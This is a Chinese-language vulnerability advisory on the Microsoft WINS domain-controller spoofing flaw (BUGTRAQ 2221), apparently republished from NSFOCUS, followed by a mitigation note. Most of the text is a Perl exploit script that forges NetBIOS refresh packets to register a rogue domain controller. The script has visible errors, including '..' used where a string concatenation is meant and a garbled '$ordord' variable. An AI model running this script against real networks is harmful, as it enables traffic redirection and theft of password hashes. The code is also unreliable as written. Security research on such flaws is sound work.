Microsoft WINS之域控制器欺骗漏洞如下所述:
受影响系统:
Microsoft Windows NT 4.0
Microsoft Windows NT 2000 Server
描述:
BUGTRAQ ID :2221
Windows Internet名字服务(WINS)随着微软Windows NT服务器分发。WINS负责在一个客户-服务器的环境中将网络计算机名解析为IP地址。
然而,WINS没有正确验证域控制器的注册。用户可能修改一个域控制器的内容,导致WINS服务将发往域控制器的请求重定向到另一个系统。这可能导致该域的网络功能失效。冒牌的域控制器也可以被设置来窃取用户名和口令的哈希值。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
David Byrne (dbyrne@tiaa-cref.org)提供了一个测试程序wins2.pl:
###########################################################################
- use Socket;
- $WINSAddress = "XXX.XXX.XXX.XXX"; #IP Address or Host/NetBIOS name
- $DomainName = "AAADUMMY"; #Must be all caps
- $SequenceNumber = 0x8000;
- socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname("udp")) or die "Socket not created $!\n";
- $destAddress = inet_aton($WINSAddress);
- $destPort = sockaddr_in(137, $destAddress);
- for ($i=1;$i<=25; $i++)
- {SendRefresh ($DomainName, 0x1C, "\x0a\x6a\x00" . chr ($i))}
- sub Sequence
- {
- my ($high, $low, $str);
- $high = $SequenceNumber >> 8;
- $low = $SequenceNumber % 256;
- $SequenceNumber += 2;
- $str = chr($high) . chr ($low);
- return $str;
- }
#p#
- sub SendRelease
- {
- my ($tempname, $data);
- $tempname = NetBIOSName ($_[0], $_[1]);
- $data = Sequence () . "\x30\x00\x00\x01\x00\x00\x00\x00\x00\x01\x20" .. $tempname . "\x00\x00\x20\x00\x01\xc0\x0c\x00\x20\x00\x01\x00\x00\x00\x00\x00\x06\x20\x00" . $_[2];
- send (SOCKET, $data, 0, $destPort) == length($data) or die "Failed to send packet: $!\n";
- }
- sub SendRefresh
- {
- my ($tempname, $data);
- $tempname = NetBIOSName ($_[0], $_[1]);
- $data = Sequence () . "\x29\x00\x00\x01\x00\x00\x00\x00\x00\x01\x20" .. $tempname . "\x00\x00\x20\x00\x01\xc0\x0c\x00\x20\x00\x01\x00\x04\x93\xe0\x00\x06\xe0\x00" . $_[2];
- send (SOCKET, $data, 0, $destPort) == length($data) or die "Failed to send packet: $!\n";
- }
- sub NetBIOSName
- {
- my ($c, $ord, $high, $low, $tempname);
- while ($_[0] =~ /(.)/g)
- {
- $c++;
- $ordord = ord ($1);
- $high = $ord >> 4;
- $low = $ord % 16;
- $tempname .= chr($high +65) . chr($low +65);
- }
- for (;$c<15;$c++)
- {$tempname .= "\x43\x41"}
- $high = $_[1] >> 4;
- $low = $_[1] % 16;
- $tempname .= chr($high +65) . chr($low +65);
- return $tempname;
- }
建议:
临时解决方法:
NSFOCUS建议您采用David Byrne提供的临时解决方法:对于敏感信息,采用静态记录。并在防火墙的DMZ区封锁NetBIOS服务。
Microsoft WINS域控制器欺骗漏洞的介绍希望能够对读者有所帮助。
【编辑推荐】